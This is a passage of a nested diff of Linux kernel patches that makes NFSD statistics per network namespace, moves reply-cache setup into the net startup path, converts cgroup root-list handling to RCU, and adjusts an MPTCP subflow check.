+-	spin_unlock(&b->cache_lock);
+-out:
+-	return rtn;
++	goto out;
+ 
+ found_entry:
+ 	/* We found a matching entry which is either in progress or done. */
+ 	nfsd_reply_cache_free_locked(NULL, rp, nn);
+-	nfsd_stats_rc_hits_inc();
++	nfsd_stats_rc_hits_inc(nn);
+ 	rtn = RC_DROPIT;
+ 	rp = found;
+ 
+@@ -525,7 +559,10 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 
+ out_trace:
+ 	trace_nfsd_drc_found(nn, rqstp, rtn);
+-	goto out_unlock;
++out_unlock:
++	spin_unlock(&b->cache_lock);
++out:
++	return rtn;
+ }
+ 
+ /**
+@@ -637,15 +674,15 @@ int nfsd_reply_cache_stats_show(struct seq_file *m, void *v)
+ 		   atomic_read(&nn->num_drc_entries));
+ 	seq_printf(m, "hash buckets:          %u\n", 1 << nn->maskbits);
+ 	seq_printf(m, "mem usage:             %lld\n",
+-		   percpu_counter_sum_positive(&nn->counter[NFSD_NET_DRC_MEM_USAGE]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_DRC_MEM_USAGE]));
+ 	seq_printf(m, "cache hits:            %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_HITS]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_HITS]));
+ 	seq_printf(m, "cache misses:          %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_MISSES]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_MISSES]));
+ 	seq_printf(m, "not cached:            %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_NOCACHE]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_NOCACHE]));
+ 	seq_printf(m, "payload misses:        %lld\n",
+-		   percpu_counter_sum_positive(&nn->counter[NFSD_NET_PAYLOAD_MISSES]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_PAYLOAD_MISSES]));
+ 	seq_printf(m, "longest chain len:     %u\n", nn->longest_chain);
+ 	seq_printf(m, "cachesize at longest:  %u\n", nn->longest_chain_cachesize);
+ 	return 0;
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 76a60e7a750978..813ae75e7128ea 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -1450,18 +1450,21 @@ static __net_init int nfsd_init_net(struct net *net)
+ 	retval = nfsd_idmap_init(net);
+ 	if (retval)
+ 		goto out_idmap_error;
++	retval = nfsd_stat_counters_init(nn);
++	if (retval)
++		goto out_repcache_error;
++	memset(&nn->nfsd_svcstats, 0, sizeof(nn->nfsd_svcstats));
++	nn->nfsd_svcstats.program = &nfsd_program;
+ 	nn->nfsd_versions = NULL;
+ 	nn->nfsd4_minorversions = NULL;
+ 	nfsd4_init_leases_net(nn);
+-	retval = nfsd_reply_cache_init(nn);
+-	if (retval)
+-		goto out_cache_error;
+ 	get_random_bytes(&nn->siphash_key, sizeof(nn->siphash_key));
+ 	seqlock_init(&nn->writeverf_lock);
++	nfsd_proc_stat_init(net);
+ 
+ 	return 0;
+ 
+-out_cache_error:
++out_repcache_error:
+ 	nfsd_idmap_shutdown(net);
+ out_idmap_error:
+ 	nfsd_export_shutdown(net);
+@@ -1473,10 +1476,11 @@ static __net_exit void nfsd_exit_net(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+-	nfsd_reply_cache_shutdown(nn);
++	nfsd_proc_stat_shutdown(net);
++	nfsd_stat_counters_destroy(nn);
+ 	nfsd_idmap_shutdown(net);
+ 	nfsd_export_shutdown(net);
+-	nfsd_netns_free_versions(net_generic(net, nfsd_net_id));
++	nfsd_netns_free_versions(nn);
+ }
+ 
+ static struct pernet_operations nfsd_net_ops = {
+@@ -1496,12 +1500,9 @@ static int __init init_nfsd(void)
+ 	retval = nfsd4_init_pnfs();
+ 	if (retval)
+ 		goto out_free_slabs;
+-	retval = nfsd_stat_init();	/* Statistics */
+-	if (retval)
+-		goto out_free_pnfs;
+ 	retval = nfsd_drc_slab_create();
+ 	if (retval)
+-		goto out_free_stat;
++		goto out_free_pnfs;
+ 	nfsd_lockd_init();	/* lockd->nfsd callbacks */
+ 	retval = create_proc_exports_entry();
+ 	if (retval)
+@@ -1531,8 +1532,6 @@ static int __init init_nfsd(void)
+ out_free_lockd:
+ 	nfsd_lockd_shutdown();
+ 	nfsd_drc_slab_free();
+-out_free_stat:
+-	nfsd_stat_shutdown();
+ out_free_pnfs:
+ 	nfsd4_exit_pnfs();
+ out_free_slabs:
+@@ -1549,7 +1548,6 @@ static void __exit exit_nfsd(void)
+ 	nfsd_drc_slab_free();
+ 	remove_proc_entry("fs/nfs/exports", NULL);
+ 	remove_proc_entry("fs/nfs", NULL);
+-	nfsd_stat_shutdown();
+ 	nfsd_lockd_shutdown();
+ 	nfsd4_free_slabs();
+ 	nfsd4_exit_pnfs();
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index fa0144a742678f..0e557fb60a0e3c 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -69,6 +69,7 @@ extern struct mutex		nfsd_mutex;
+ extern spinlock_t		nfsd_drc_lock;
+ extern unsigned long		nfsd_drc_max_mem;
+ extern unsigned long		nfsd_drc_mem_used;
++extern atomic_t			nfsd_th_cnt;		/* number of available threads */
+ 
+ extern const struct seq_operations nfs_exports_op;
+ 
+diff --git a/fs/nfsd/nfsfh.c b/fs/nfsd/nfsfh.c
+index 3a2ad88ae6481e..e73e9d44f1b0ca 100644
+--- a/fs/nfsd/nfsfh.c
++++ b/fs/nfsd/nfsfh.c
+@@ -327,6 +327,7 @@ static __be32 nfsd_set_fh_dentry(struct svc_rqst *rqstp, struct svc_fh *fhp)
+ __be32
+ fh_verify(struct svc_rqst *rqstp, struct svc_fh *fhp, umode_t type, int access)
+ {
++	struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 	struct svc_export *exp = NULL;
+ 	struct dentry	*dentry;
+ 	__be32		error;
+@@ -395,7 +396,7 @@ fh_verify(struct svc_rqst *rqstp, struct svc_fh *fhp, umode_t type, int access)
+ out:
+ 	trace_nfsd_fh_verify_err(rqstp, fhp, type, access, error);
+ 	if (error == nfserr_stale)
+-		nfsd_stats_fh_stale_inc(exp);
++		nfsd_stats_fh_stale_inc(nn, exp);
+ 	return error;
+ }
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index a8190caf77f172..9eb529969b224a 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -34,6 +34,7 @@
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_SVC
+ 
++atomic_t			nfsd_th_cnt = ATOMIC_INIT(0);
+ extern struct svc_program	nfsd_program;
+ static int			nfsd(void *vrqstp);
+ #if defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL)
+@@ -89,7 +90,6 @@ unsigned long	nfsd_drc_max_mem;
+ unsigned long	nfsd_drc_mem_used;
+ 
+ #if defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL)
+-static struct svc_stat	nfsd_acl_svcstats;
+ static const struct svc_version *nfsd_acl_version[] = {
+ # if defined(CONFIG_NFSD_V2_ACL)
+ 	[2] = &nfsd_acl_version2,
+@@ -108,15 +108,11 @@ static struct svc_program	nfsd_acl_program = {
+ 	.pg_vers		= nfsd_acl_version,
+ 	.pg_name		= "nfsacl",
+ 	.pg_class		= "nfsd",
+-	.pg_stats		= &nfsd_acl_svcstats,
+ 	.pg_authenticate	= &svc_set_client,
+ 	.pg_init_request	= nfsd_acl_init_request,
+ 	.pg_rpcbind_set		= nfsd_acl_rpcbind_set,
+ };
+ 
+-static struct svc_stat	nfsd_acl_svcstats = {
+-	.program	= &nfsd_acl_program,
+-};
+ #endif /* defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL) */
+ 
+ static const struct svc_version *nfsd_version[] = {
+@@ -141,7 +137,6 @@ struct svc_program		nfsd_program = {
+ 	.pg_vers		= nfsd_version,		/* version table */
+ 	.pg_name		= "nfsd",		/* program name */
+ 	.pg_class		= "nfsd",		/* authentication class */
+-	.pg_stats		= &nfsd_svcstats,	/* version table */
+ 	.pg_authenticate	= &svc_set_client,	/* export authentication */
+ 	.pg_init_request	= nfsd_init_request,
+ 	.pg_rpcbind_set		= nfsd_rpcbind_set,
+@@ -427,16 +422,23 @@ static int nfsd_startup_net(struct net *net, const struct cred *cred)
+ 	ret = nfsd_file_cache_start_net(net);
+ 	if (ret)
+ 		goto out_lockd;
+-	ret = nfs4_state_start_net(net);
++
++	ret = nfsd_reply_cache_init(nn);
+ 	if (ret)
+ 		goto out_filecache;
+ 
++	ret = nfs4_state_start_net(net);
++	if (ret)
++		goto out_reply_cache;
++
+ #ifdef CONFIG_NFSD_V4_2_INTER_SSC
+ 	nfsd4_ssc_init_umount_work(nn);
+ #endif
+ 	nn->nfsd_net_up = true;
+ 	return 0;
+ 
++out_reply_cache:
++	nfsd_reply_cache_shutdown(nn);
+ out_filecache:
+ 	nfsd_file_cache_shutdown_net(net);
+ out_lockd:
+@@ -454,6 +456,7 @@ static void nfsd_shutdown_net(struct net *net)
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+ 	nfs4_state_shutdown_net(net);
++	nfsd_reply_cache_shutdown(nn);
+ 	nfsd_file_cache_shutdown_net(net);
+ 	if (nn->lockd_up) {
+ 		lockd_down(net);
+@@ -654,7 +657,8 @@ int nfsd_create_serv(struct net *net)
+ 	if (nfsd_max_blksize == 0)
+ 		nfsd_max_blksize = nfsd_get_default_max_blksize();
+ 	nfsd_reset_versions(nn);
+-	serv = svc_create_pooled(&nfsd_program, nfsd_max_blksize, nfsd);
++	serv = svc_create_pooled(&nfsd_program, &nn->nfsd_svcstats,
++				 nfsd_max_blksize, nfsd);
+ 	if (serv == NULL)
+ 		return -ENOMEM;
+ 
+@@ -952,7 +956,7 @@ nfsd(void *vrqstp)
+ 
+ 	current->fs->umask = 0;
+ 
+-	atomic_inc(&nfsdstats.th_cnt);
++	atomic_inc(&nfsd_th_cnt);
+ 
+ 	set_freezable();
+ 
+@@ -976,7 +980,7 @@ nfsd(void *vrqstp)
+ 		validate_process_creds();
+ 	}
+ 
+-	atomic_dec(&nfsdstats.th_cnt);
++	atomic_dec(&nfsd_th_cnt);
+ 
+ out:
+ 	/* Take an extra ref so that the svc_put in svc_exit_thread()
+diff --git a/fs/nfsd/stats.c b/fs/nfsd/stats.c
+index 777e24e5da33bd..36f1373bbe3f05 100644
+--- a/fs/nfsd/stats.c
++++ b/fs/nfsd/stats.c
+@@ -27,25 +27,22 @@
+ 
+ #include "nfsd.h"
+ 
+-struct nfsd_stats	nfsdstats;
+-struct svc_stat		nfsd_svcstats = {
+-	.program	= &nfsd_program,
+-};
+-
+ static int nfsd_show(struct seq_file *seq, void *v)
+ {
++	struct net *net = pde_data(file_inode(seq->file));
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 	int i;
+ 
+ 	seq_printf(seq, "rc %lld %lld %lld\nfh %lld 0 0 0 0\nio %lld %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_HITS]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_MISSES]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_NOCACHE]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_FH_STALE]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_IO_READ]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_IO_WRITE]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_HITS]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_MISSES]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_NOCACHE]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_FH_STALE]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_IO_READ]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_IO_WRITE]));
+ 
+ 	/* thread usage: */
+-	seq_printf(seq, "th %u 0", atomic_read(&nfsdstats.th_cnt));
++	seq_printf(seq, "th %u 0", atomic_read(&nfsd_th_cnt));
+ 
+ 	/* deprecated thread usage histogram stats */
+ 	for (i = 0; i < 10; i++)
+@@ -55,7 +52,7 @@ static int nfsd_show(struct seq_file *seq, void *v)
+ 	seq_puts(seq, "\nra 0 0 0 0 0 0 0 0 0 0 0 0\n");
+ 
+ 	/* show my rpc info */
+-	svc_seq_show(seq, &nfsd_svcstats);
++	svc_seq_show(seq, &nn->nfsd_svcstats);
+ 
+ #ifdef CONFIG_NFSD_V4
+ 	/* Show count for individual nfsv4 operations */
+@@ -63,7 +60,7 @@ static int nfsd_show(struct seq_file *seq, void *v)
+ 	seq_printf(seq,"proc4ops %u", LAST_NFS4_OP + 1);
+ 	for (i = 0; i <= LAST_NFS4_OP; i++) {
+ 		seq_printf(seq, " %lld",
+-			   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_NFS4_OP(i)]));
++			   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_NFS4_OP(i)]));
+ 	}
+ 
+ 	seq_putc(seq, '\n');
+@@ -74,7 +71,7 @@ static int nfsd_show(struct seq_file *seq, void *v)
+ 
+ DEFINE_PROC_SHOW_ATTRIBUTE(nfsd);
+ 
+-int nfsd_percpu_counters_init(struct percpu_counter counters[], int num)
++int nfsd_percpu_counters_init(struct percpu_counter *counters, int num)
+ {
+ 	int i, err = 0;
+ 
+@@ -106,31 +103,24 @@ void nfsd_percpu_counters_destroy(struct percpu_counter counters[], int num)
+ 		percpu_counter_destroy(&counters[i]);
+ }
+ 
+-static int nfsd_stat_counters_init(void)
++int nfsd_stat_counters_init(struct nfsd_net *nn)
+ {
+-	return nfsd_percpu_counters_init(nfsdstats.counter, NFSD_STATS_COUNTERS_NUM);
++	return nfsd_percpu_counters_init(nn->counter, NFSD_STATS_COUNTERS_NUM);
+ }
+ 
+-static void nfsd_stat_counters_destroy(void)
++void nfsd_stat_counters_destroy(struct nfsd_net *nn)
+ {
+-	nfsd_percpu_counters_destroy(nfsdstats.counter, NFSD_STATS_COUNTERS_NUM);
++	nfsd_percpu_counters_destroy(nn->counter, NFSD_STATS_COUNTERS_NUM);
+ }
+ 
+-int nfsd_stat_init(void)
++void nfsd_proc_stat_init(struct net *net)
+ {
+-	int err;
+-
+-	err = nfsd_stat_counters_init();
+-	if (err)
+-		return err;
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+-	svc_proc_register(&init_net, &nfsd_svcstats, &nfsd_proc_ops);
+-
+-	return 0;
++	svc_proc_register(net, &nn->nfsd_svcstats, &nfsd_proc_ops);
+ }
+ 
+-void nfsd_stat_shutdown(void)
++void nfsd_proc_stat_shutdown(struct net *net)
+ {
+-	nfsd_stat_counters_destroy();
+-	svc_proc_unregister(&init_net, "nfsd");
++	svc_proc_unregister(net, "nfsd");
+ }
+diff --git a/fs/nfsd/stats.h b/fs/nfsd/stats.h
+index 9b43dc3d999139..14525e854cbac3 100644
+--- a/fs/nfsd/stats.h
++++ b/fs/nfsd/stats.h
+@@ -10,87 +10,66 @@
+ #include <uapi/linux/nfsd/stats.h>
+ #include <linux/percpu_counter.h>
+ 
+-
+-enum {
+-	NFSD_STATS_RC_HITS,		/* repcache hits */
+-	NFSD_STATS_RC_MISSES,		/* repcache misses */
+-	NFSD_STATS_RC_NOCACHE,		/* uncached reqs */
+-	NFSD_STATS_FH_STALE,		/* FH stale error */
+-	NFSD_STATS_IO_READ,		/* bytes returned to read requests */
+-	NFSD_STATS_IO_WRITE,		/* bytes passed in write requests */
+-#ifdef CONFIG_NFSD_V4
+-	NFSD_STATS_FIRST_NFS4_OP,	/* count of individual nfsv4 operations */
+-	NFSD_STATS_LAST_NFS4_OP = NFSD_STATS_FIRST_NFS4_OP + LAST_NFS4_OP,
+-#define NFSD_STATS_NFS4_OP(op)	(NFSD_STATS_FIRST_NFS4_OP + (op))
+-#endif
+-	NFSD_STATS_COUNTERS_NUM
+-};
+-
+-struct nfsd_stats {
+-	struct percpu_counter	counter[NFSD_STATS_COUNTERS_NUM];
+-
+-	atomic_t	th_cnt;		/* number of available threads */
+-};
+-
+-extern struct nfsd_stats	nfsdstats;
+-
+-extern struct svc_stat		nfsd_svcstats;
+-
+-int nfsd_percpu_counters_init(struct percpu_counter counters[], int num);
+-void nfsd_percpu_counters_reset(struct percpu_counter counters[], int num);
+-void nfsd_percpu_counters_destroy(struct percpu_counter counters[], int num);
+-int nfsd_stat_init(void);
+-void nfsd_stat_shutdown(void);
+-
+-static inline void nfsd_stats_rc_hits_inc(void)
++int nfsd_percpu_counters_init(struct percpu_counter *counters, int num);
++void nfsd_percpu_counters_reset(struct percpu_counter *counters, int num);
++void nfsd_percpu_counters_destroy(struct percpu_counter *counters, int num);
++int nfsd_stat_counters_init(struct nfsd_net *nn);
++void nfsd_stat_counters_destroy(struct nfsd_net *nn);
++void nfsd_proc_stat_init(struct net *net);
++void nfsd_proc_stat_shutdown(struct net *net);
++
++static inline void nfsd_stats_rc_hits_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_RC_HITS]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_RC_HITS]);
+ }
+ 
+-static inline void nfsd_stats_rc_misses_inc(void)
++static inline void nfsd_stats_rc_misses_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_RC_MISSES]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_RC_MISSES]);
+ }
+ 
+-static inline void nfsd_stats_rc_nocache_inc(void)
++static inline void nfsd_stats_rc_nocache_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_RC_NOCACHE]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_RC_NOCACHE]);
+ }
+ 
+-static inline void nfsd_stats_fh_stale_inc(struct svc_export *exp)
++static inline void nfsd_stats_fh_stale_inc(struct nfsd_net *nn,
++					   struct svc_export *exp)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_FH_STALE]);
+-	if (exp)
+-		percpu_counter_inc(&exp->ex_stats.counter[EXP_STATS_FH_STALE]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_FH_STALE]);
++	if (exp && exp->ex_stats)
++		percpu_counter_inc(&exp->ex_stats->counter[EXP_STATS_FH_STALE]);
+ }
+ 
+-static inline void nfsd_stats_io_read_add(struct svc_export *exp, s64 amount)
++static inline void nfsd_stats_io_read_add(struct nfsd_net *nn,
++					  struct svc_export *exp, s64 amount)
+ {
+-	percpu_counter_add(&nfsdstats.counter[NFSD_STATS_IO_READ], amount);
+-	if (exp)
+-		percpu_counter_add(&exp->ex_stats.counter[EXP_STATS_IO_READ], amount);
++	percpu_counter_add(&nn->counter[NFSD_STATS_IO_READ], amount);
++	if (exp && exp->ex_stats)
++		percpu_counter_add(&exp->ex_stats->counter[EXP_STATS_IO_READ], amount);
+ }
+ 
+-static inline void nfsd_stats_io_write_add(struct svc_export *exp, s64 amount)
++static inline void nfsd_stats_io_write_add(struct nfsd_net *nn,
++					   struct svc_export *exp, s64 amount)
+ {
+-	percpu_counter_add(&nfsdstats.counter[NFSD_STATS_IO_WRITE], amount);
+-	if (exp)
+-		percpu_counter_add(&exp->ex_stats.counter[EXP_STATS_IO_WRITE], amount);
++	percpu_counter_add(&nn->counter[NFSD_STATS_IO_WRITE], amount);
++	if (exp && exp->ex_stats)
++		percpu_counter_add(&exp->ex_stats->counter[EXP_STATS_IO_WRITE], amount);
+ }
+ 
+ static inline void nfsd_stats_payload_misses_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nn->counter[NFSD_NET_PAYLOAD_MISSES]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_PAYLOAD_MISSES]);
+ }
+ 
+ static inline void nfsd_stats_drc_mem_usage_add(struct nfsd_net *nn, s64 amount)
+ {
+-	percpu_counter_add(&nn->counter[NFSD_NET_DRC_MEM_USAGE], amount);
++	percpu_counter_add(&nn->counter[NFSD_STATS_DRC_MEM_USAGE], amount);
+ }
+ 
+ static inline void nfsd_stats_drc_mem_usage_sub(struct nfsd_net *nn, s64 amount)
+ {
+-	percpu_counter_sub(&nn->counter[NFSD_NET_DRC_MEM_USAGE], amount);
++	percpu_counter_sub(&nn->counter[NFSD_STATS_DRC_MEM_USAGE], amount);
+ }
+ 
+ #endif /* _NFSD_STATS_H */
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 84f26f281fe9f2..447b3483f94ba3 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -1261,6 +1261,28 @@ TRACE_EVENT(nfsd_drc_mismatch,
+ 		__entry->ingress)
+ );
+ 
++TRACE_EVENT_CONDITION(nfsd_drc_gc,
++	TP_PROTO(
++		const struct nfsd_net *nn,
++		unsigned long freed
++	),
++	TP_ARGS(nn, freed),
++	TP_CONDITION(freed > 0),
++	TP_STRUCT__entry(
++		__field(unsigned long long, boot_time)
++		__field(unsigned long, freed)
++		__field(int, total)
++	),
++	TP_fast_assign(
++		__entry->boot_time = nn->boot_time;
++		__entry->freed = freed;
++		__entry->total = atomic_read(&nn->num_drc_entries);
++	),
++	TP_printk("boot_time=%16llx total=%d freed=%lu",
++		__entry->boot_time, __entry->total, __entry->freed
++	)
++);
++
+ TRACE_EVENT(nfsd_cb_args,
+ 	TP_PROTO(
+ 		const struct nfs4_client *clp,
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 5d6a61d47a9059..17e96e58e77279 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -983,7 +983,9 @@ static __be32 nfsd_finish_read(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 			       unsigned long *count, u32 *eof, ssize_t host_err)
+ {
+ 	if (host_err >= 0) {
+-		nfsd_stats_io_read_add(fhp->fh_export, host_err);
++		struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
++
++		nfsd_stats_io_read_add(nn, fhp->fh_export, host_err);
+ 		*eof = nfsd_eof_on_read(file, offset, host_err, *count);
+ 		*count = host_err;
+ 		fsnotify_access(file);
+@@ -1126,7 +1128,7 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 		goto out_nfserr;
+ 	}
+ 	*cnt = host_err;
+-	nfsd_stats_io_write_add(exp, *cnt);
++	nfsd_stats_io_write_add(nn, exp, *cnt);
+ 	fsnotify_modify(file);
+ 	host_err = filemap_check_wb_err(file->f_mapping, since);
+ 	if (host_err < 0)
+diff --git a/include/linux/cgroup-defs.h b/include/linux/cgroup-defs.h
+index 6e01f10f0d8899..be8980b023550e 100644
+--- a/include/linux/cgroup-defs.h
++++ b/include/linux/cgroup-defs.h
+@@ -525,6 +525,10 @@ struct cgroup_root {
+ 	/* Unique id for this hierarchy. */
+ 	int hierarchy_id;
+ 
++	/* A list running through the active hierarchies */
++	struct list_head root_list;
++	struct rcu_head rcu;	/* Must be near the top */
++
+ 	/*
+ 	 * The root cgroup. The containing cgroup_root will be destroyed on its
+ 	 * release. cgrp->ancestors[0] will be used overflowing into the
+@@ -538,9 +542,6 @@ struct cgroup_root {
+ 	/* Number of cgroups in the hierarchy, used only for /proc/cgroups */
+ 	atomic_t nr_cgrps;
+ 
+-	/* A list running through the active hierarchies */
+-	struct list_head root_list;
+-
+ 	/* Hierarchy-specific flags */
+ 	unsigned int flags;
+ 
+diff --git a/include/linux/sunrpc/svc.h b/include/linux/sunrpc/svc.h
+index 88de45491376a6..912da376ef9bf1 100644
+--- a/include/linux/sunrpc/svc.h
++++ b/include/linux/sunrpc/svc.h
+@@ -422,7 +422,6 @@ struct svc_program {
+ 	const struct svc_version **pg_vers;	/* version array */
+ 	char *			pg_name;	/* service name */
+ 	char *			pg_class;	/* class name: services sharing authentication */
+-	struct svc_stat *	pg_stats;	/* rpc statistics */
+ 	int			(*pg_authenticate)(struct svc_rqst *);
+ 	__be32			(*pg_init_request)(struct svc_rqst *,
+ 						   const struct svc_program *,
+@@ -493,7 +492,9 @@ void		   svc_rqst_replace_page(struct svc_rqst *rqstp,
+ 					 struct page *page);
+ void		   svc_rqst_free(struct svc_rqst *);
+ void		   svc_exit_thread(struct svc_rqst *);
+-struct svc_serv *  svc_create_pooled(struct svc_program *, unsigned int,
++struct svc_serv *  svc_create_pooled(struct svc_program *prog,
++				     struct svc_stat *stats,
++				     unsigned int bufsize,
+ 				     int (*threadfn)(void *data));
+ int		   svc_set_num_threads(struct svc_serv *, struct svc_pool *, int);
+ int		   svc_pool_stats_open(struct svc_serv *serv, struct file *file);
+diff --git a/kernel/cgroup/cgroup-internal.h b/kernel/cgroup/cgroup-internal.h
+index 367b0a42ada909..2fbd29a1c1e7f2 100644
+--- a/kernel/cgroup/cgroup-internal.h
++++ b/kernel/cgroup/cgroup-internal.h
+@@ -170,7 +170,8 @@ extern struct list_head cgroup_roots;
+ 
+ /* iterate across the hierarchies */
+ #define for_each_root(root)						\
+-	list_for_each_entry((root), &cgroup_roots, root_list)
++	list_for_each_entry_rcu((root), &cgroup_roots, root_list,	\
++				lockdep_is_held(&cgroup_mutex))
+ 
+ /**
+  * for_each_subsys - iterate all enabled cgroup subsystems
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 1e008ea467c0a1..489c25713edcb7 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1346,7 +1346,7 @@ static void cgroup_exit_root_id(struct cgroup_root *root)
+ 
+ void cgroup_free_root(struct cgroup_root *root)
+ {
+-	kfree(root);
++	kfree_rcu(root, rcu);
+ }
+ 
+ static void cgroup_destroy_root(struct cgroup_root *root)
+@@ -1379,7 +1379,7 @@ static void cgroup_destroy_root(struct cgroup_root *root)
+ 	spin_unlock_irq(&css_set_lock);
+ 
+ 	if (!list_empty(&root->root_list)) {
+-		list_del(&root->root_list);
++		list_del_rcu(&root->root_list);
+ 		cgroup_root_count--;
+ 	}
+ 
+@@ -1419,7 +1419,15 @@ static inline struct cgroup *__cset_cgroup_from_root(struct css_set *cset,
+ 		}
+ 	}
+ 
+-	BUG_ON(!res_cgroup);
++	/*
++	 * If cgroup_mutex is not held, the cgrp_cset_link will be freed
++	 * before we remove the cgroup root from the root_list. Consequently,
++	 * when accessing a cgroup root, the cset_link may have already been
++	 * freed, resulting in a NULL res_cgroup. However, by holding the
++	 * cgroup_mutex, we ensure that res_cgroup can't be NULL.
++	 * If we don't hold cgroup_mutex in the caller, we must do the NULL
++	 * check.
++	 */
+ 	return res_cgroup;
+ }
+ 
+@@ -1468,7 +1476,6 @@ static struct cgroup *current_cgns_cgroup_dfl(void)
+ static struct cgroup *cset_cgroup_from_root(struct css_set *cset,
+ 					    struct cgroup_root *root)
+ {
+-	lockdep_assert_held(&cgroup_mutex);
+ 	lockdep_assert_held(&css_set_lock);
+ 
+ 	return __cset_cgroup_from_root(cset, root);
+@@ -1476,7 +1483,9 @@ static struct cgroup *cset_cgroup_from_root(struct css_set *cset,
+ 
+ /*
+  * Return the cgroup for "task" from the given hierarchy. Must be
+- * called with cgroup_mutex and css_set_lock held.
++ * called with css_set_lock held to prevent task's groups from being modified.
++ * Must be called with either cgroup_mutex or rcu read lock to prevent the
++ * cgroup root from being destroyed.
+  */
+ struct cgroup *task_cgroup_from_root(struct task_struct *task,
+ 				     struct cgroup_root *root)
+@@ -2037,7 +2046,7 @@ void init_cgroup_root(struct cgroup_fs_context *ctx)
+ 	struct cgroup_root *root = ctx->root;
+ 	struct cgroup *cgrp = &root->cgrp;
+ 
+-	INIT_LIST_HEAD(&root->root_list);
++	INIT_LIST_HEAD_RCU(&root->root_list);
+ 	atomic_set(&root->nr_cgrps, 1);
+ 	cgrp->root = root;
+ 	init_cgroup_housekeeping(cgrp);
+@@ -2120,7 +2129,7 @@ int cgroup_setup_root(struct cgroup_root *root, u16 ss_mask)
+ 	 * care of subsystems' refcounts, which are explicitly dropped in
+ 	 * the failure exit path.
+ 	 */
+-	list_add(&root->root_list, &cgroup_roots);
++	list_add_rcu(&root->root_list, &cgroup_roots);
+ 	cgroup_root_count++;
+ 
+ 	/*
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index daf53d685b5f3d..d469ad6c6a0ba4 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -950,7 +950,8 @@ static bool check_fully_established(struct mptcp_sock *msk, struct sock *ssk,
+ 	}
+ 
+ 	if (((mp_opt->suboptions & OPTION_MPTCP_DSS) && mp_opt->use_ack) ||
+-	    ((mp_opt->suboptions & OPTION_MPTCP_ADD_ADDR) && !mp_opt->echo)) {
++	    ((mp_opt->suboptions & OPTION_MPTCP_ADD_ADDR) &&
++	     (!mp_opt->echo || subflow->mp_join))) {
+ 		/* subflows are fully established as soon as we get any
+ 		 * additional ack, including ADD_ADDR.
+ 		 */
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 2b5a5680f09acb..368886d3faac6c 100644
